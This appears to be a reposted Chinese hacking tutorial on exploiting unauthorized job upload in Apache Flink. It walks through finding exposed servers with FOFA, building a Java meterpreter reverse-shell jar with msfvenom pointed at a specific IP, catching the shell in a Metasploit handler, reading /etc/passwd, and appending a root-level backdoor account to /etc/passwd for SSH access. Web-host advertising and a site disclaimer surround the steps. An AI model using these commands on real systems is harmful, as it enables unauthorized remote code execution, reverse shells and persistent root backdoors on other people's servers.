1、fofa 搜索 app=“Apache-Flink” 可以看到有上千個

2、生成木馬
下面展示一些內(nèi)聯(lián)代碼片。

創(chuàng)新互聯(lián)主營太和網(wǎng)站建設(shè)的網(wǎng)絡(luò)公司,主營網(wǎng)站建設(shè)方案,App定制開發(fā),太和h5微信小程序搭建,太和網(wǎng)站營銷推廣歡迎太和等地區(qū)企業(yè)咨詢

msfvenom -p java/meterpreter/reverse_tcp LHOST=47.103.79.70 LPORT=4444 -f jar >rce.jar

msfvenom -p java/meterpreter/reverse_tcp LHOST=47.103.79.70 LPORT=4444 -f jar >rce.jar
3、打開msf 進行如下配置，并進行監(jiān)聽
下面展示一些內(nèi)聯(lián)代碼片。

use exploit/multi/handler
set payload java/shell/reverse_tcp
set LHOST 47.103.79.70
set lport 4444
lport =>4444
run

3、上傳剛才生成的木馬，并執(zhí)行


4、看到shell已經(jīng)反彈回來

5、通過id 、 whoami 、cat /etc/passwd等命令查看當(dāng)前用戶及權(quán)限

6、通過如下代碼強制寫入賬號及密碼

echo "sql:LRxM3nP3LOiYU:0:0:hello:/root:/bin/bash">>/etc/passwd

7、再次查看passwd可看到賬號已經(jīng)寫入成功，現(xiàn)在即可ssh登錄了 密碼為123

8、如果遇到登錄失敗，看參考上一篇docker提權(quán)的常見問題進行解決
鏈接: link
https://blog.csdn.net/u010025272/article/details/128176310?spm=1001.2014.3001.5502

你是否還在尋找穩(wěn)定的海外服務(wù)器提供商？創(chuàng)新互聯(lián)www.cdcxhl.cn海外機房具備T級流量清洗系統(tǒng)配攻擊溯源，準(zhǔn)確流量調(diào)度確保服務(wù)器高可用性，企業(yè)級服務(wù)器適合批量采購，新人活動首月15元起，快前往官網(wǎng)查看詳情吧

網(wǎng)站名稱：ApacheFlink未授權(quán)遠(yuǎn)程代碼執(zhí)行提權(quán)（實戰(zhàn)）-創(chuàng)新互聯(lián)
地址分享：http://aaarwkj.com/article46/hojhg.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供用戶體驗、外貿(mào)建站、做網(wǎng)站、網(wǎng)站改版、網(wǎng)站建設(shè)、網(wǎng)站導(dǎo)航

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時需注明來源： 創(chuàng)新互聯(lián)